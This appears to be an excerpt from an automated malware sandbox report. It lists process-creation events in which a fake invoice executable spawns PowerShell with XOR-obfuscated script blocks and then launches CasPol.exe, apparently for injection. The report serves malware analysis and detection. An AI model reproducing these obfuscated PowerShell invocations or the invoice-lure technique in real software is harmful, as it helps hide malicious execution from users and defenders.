Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6561763A -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x46696E3A -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x41286F7F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x72342273 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2069226F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x7838326F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3030326F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x302C2236 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x20302E7F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x70203273 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2069226B -bxor 607}
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x30783A6F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x30296B71 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x72332272 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x656C316D -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3A3A5436 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x7274773E -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6C416E33 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6F632A36 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x302C6B7F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3539366B -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3131376D -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3078316F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x30302E7F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x69203227 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x34302B2F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2E723372 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x656C316D -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3A3A513A -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x74466B33 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6E74672D -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2869706C -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3734306B -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x202C2236 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x20302E36 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x20302B36 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2E723072 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x656C316D -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3A3A503A -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x61644436 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6C652A36 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x72332E7F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6920706E -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3539366B -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3131376D -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C2A6B7F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x302C2236 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x20302B36 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x7573672D -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x33323865 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x57696C3B -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6F77522D -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6F634377 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6972337F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C69226F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C69226F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x302C2236 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x20302B72 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\INVOICE-98656789.exe
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x7573672D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x33323865 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x53686D28 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x57696C3B -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6F772A36 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x72352E36 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x30292272 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x656C316D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3A3A412D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6561763A -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x46696E3A -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x41286F7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x72342273 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2069226F -bxor 607}	Jump to behavior
